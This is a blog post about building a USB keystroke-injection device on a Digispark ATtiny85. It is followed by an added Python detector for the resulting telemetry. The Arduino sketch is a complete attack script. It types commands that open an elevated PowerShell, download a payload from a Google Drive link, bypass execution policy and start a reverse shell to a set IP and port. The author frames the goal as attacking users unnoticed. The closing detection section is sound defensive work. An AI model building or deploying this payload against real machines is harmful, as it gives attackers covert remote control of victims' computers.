This week my ATtiny85 came in the mail from China, and so far I am extremely impressed with the ease of not only the Digispark keyboard library but the Arduino IDE itself. I created a couple of simple projects, but for the most part I focused on one primary proof of concept.
Project Goal: Create a simple and quick reverse shell for Windows that doesn't draw too much attention to itself.
Now, with that goal in mind, I stuck to PowerShell for a few reasons. First, it's an extremely robust and easy-to-use language. Second, PowerShell running on an endpoint rarely raises any red flags in and of itself. Finally, it is on every modern Windows distribution, which allows me to attack a wide range of users.
With all that in mind, let's get into it:
First, I picked up my hardware here: https://bit.ly/2CD6f62 for just under $5.
Then I followed Thomas's tutorial at Hackernoon: https://bit.ly/2HqMWmt
I downloaded a PS payload via GitHub, and then I was ready to go!
Finally, I built my attack script:
#include "DigiKeyboard.h"
#define KEY_LEFT_ARROW 0xD8
// PowerShell reverse shell https://drive.google.com/uc?export=download&id=yourdownloadhere
// Written by Jordon Lovik for research purposes only. Do not use or distribute this code for anything but education. I am not liable for any harm this script may do to you or anyone else's computer.
void setup() {
  // runspeed: use numbers between 50 - 2000
  int runspeed = 500;
  // define LED
  pinMode(0, OUTPUT); // LED on Model B
  pinMode(1, OUTPUT); // LED on Model A
  DigiKeyboard.delay(3*runspeed);
  // Turn light on
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  DigiKeyboard.sendKeyStroke(0,0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(1*runspeed);
  // Start PowerShell as administrator - enables you to bypass execution policy later
  DigiKeyboard.println("powershell Start-Process powershell.exe -Verb runAs");
  DigiKeyboard.delay(1*runspeed);
  DigiKeyboard.sendKeyStroke(0,0);
  DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW);
  DigiKeyboard.delay(3*runspeed);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  // Define payload download location (make sure this is a direct download link)
  DigiKeyboard.delay(3*runspeed);
  DigiKeyboard.println("$url = \"https://drive.google.com/uc?export=download&id=13DLtW-ftkkFPryAc2DzqnM7jUrZzqhQs\"");
  DigiKeyboard.update();
  DigiKeyboard.delay(1*runspeed);
  // Grabs user name based on logged on user and stores it in $user
  DigiKeyboard.println("$user = [Environment]::UserName");
  DigiKeyboard.update();
  DigiKeyboard.delay(1*runspeed);
  // Write to conditional output path, using the desktop for debugging
  DigiKeyboard.println("$output = \"C:\\Users\\$user\\Desktop\\payload1.ps1\"");
  DigiKeyboard.update();
  DigiKeyboard.delay(1*runspeed);
  // Download the payload from the specified URL
  DigiKeyboard.println("Invoke-WebRequest -Uri $url -OutFile $output");
  DigiKeyboard.update();
  DigiKeyboard.delay(3*runspeed);
  // -windowstyle hidden
  DigiKeyboard.println("powershell.exe -ExecutionPolicy ByPass \"C:\\Users\\$user\\Desktop\\payload1.ps1 -dest 172.16.31.84 -port 443\""); // IP
}
void loop() {
  // Blink lights when script completes
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  delay(50);
  digitalWrite(0, LOW);
  digitalWrite(1, LOW);
  delay(50);
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  delay(20);
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  delay(20);
}
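From the defender's side, the three commands the sketch above types leave a recognisable trail in endpoint telemetry: an elevated PowerShell launched from explorer.exe with Start-Process -Verb runAs, an Invoke-WebRequest dropping a .ps1 on the Desktop, and a second PowerShell started with -ExecutionPolicy ByPass, all within a few seconds, a cadence no human typing at the keyboard produces. The following Python is an added example, not part of the original post; it runs that logic over constructed Sysmon-style process-creation and PowerShell script-block records whose layout and field names are assumptions.

```python
import re
from datetime import datetime

# Constructed sample telemetry (not real logs): Sysmon-style process-creation
# records and PowerShell 4104 script-block records, as (timestamp, source, text).
SAMPLE_EVENTS = [
    ("2024-05-01T09:12:03", "ProcessCreate",
     r"Parent=C:\Windows\explorer.exe Cmd=powershell Start-Process powershell.exe -Verb runAs"),
    ("2024-05-01T09:12:09", "ScriptBlock",
     r"Invoke-WebRequest -Uri $url -OutFile C:\Users\alice\Desktop\payload1.ps1"),
    ("2024-05-01T09:12:13", "ProcessCreate",
     r'Parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Cmd=powershell.exe -ExecutionPolicy ByPass "C:\Users\alice\Desktop\payload1.ps1 -dest 172.16.31.84 -port 443"'),
    # Benign admin script launched from the shell: matches no stage.
    ("2024-05-01T14:30:00", "ProcessCreate",
     r"Parent=C:\Windows\explorer.exe Cmd=powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

# One (name, event source, regex) rule per stage of the typed chain.
STAGES = [
    ("elevate", "ProcessCreate",
     re.compile(r"Parent=.*\\explorer\.exe .*Start-Process powershell(\.exe)? -Verb runAs", re.I)),
    ("download", "ScriptBlock",
     re.compile(r"Invoke-WebRequest .*-OutFile .*\\Desktop\\.*\.ps1", re.I)),
    ("execute", "ProcessCreate",
     re.compile(r"-ExecutionPolicy ByPass .*\\Desktop\\.*\.ps1 .*-port \d+", re.I)),
]

def detect_chain(events, window_seconds=30):
    """Return (stage_names, first_ts, last_ts) for every cluster of at least two
    distinct stages that land within window_seconds of each other."""
    hits = []
    for ts, source, text in events:
        for name, src, rx in STAGES:
            if source == src and rx.search(text):
                hits.append((datetime.fromisoformat(ts), name))
    hits.sort()
    findings, i = [], 0
    while i < len(hits):
        j = i
        # Extend the cluster while the next hit is still inside the window.
        while j + 1 < len(hits) and (hits[j + 1][0] - hits[i][0]).total_seconds() <= window_seconds:
            j += 1
        names = [n for _, n in hits[i:j + 1]]
        if len(set(names)) >= 2:
            findings.append((names, hits[i][0].isoformat(), hits[j][0].isoformat()))
        i = j + 1
    return findings

if __name__ == "__main__":
    for names, first, last in detect_chain(SAMPLE_EVENTS):
        print(f"keystroke-injection-like chain {names} between {first} and {last}")
```

In production the same rules would sit on Sysmon Event ID 1 and PowerShell Event ID 4104 feeds, and correlating them with a USB HID device arrival (Event ID 2003 from the DriverFrameworks-UserMode log) shortly before the first stage tightens the signal further.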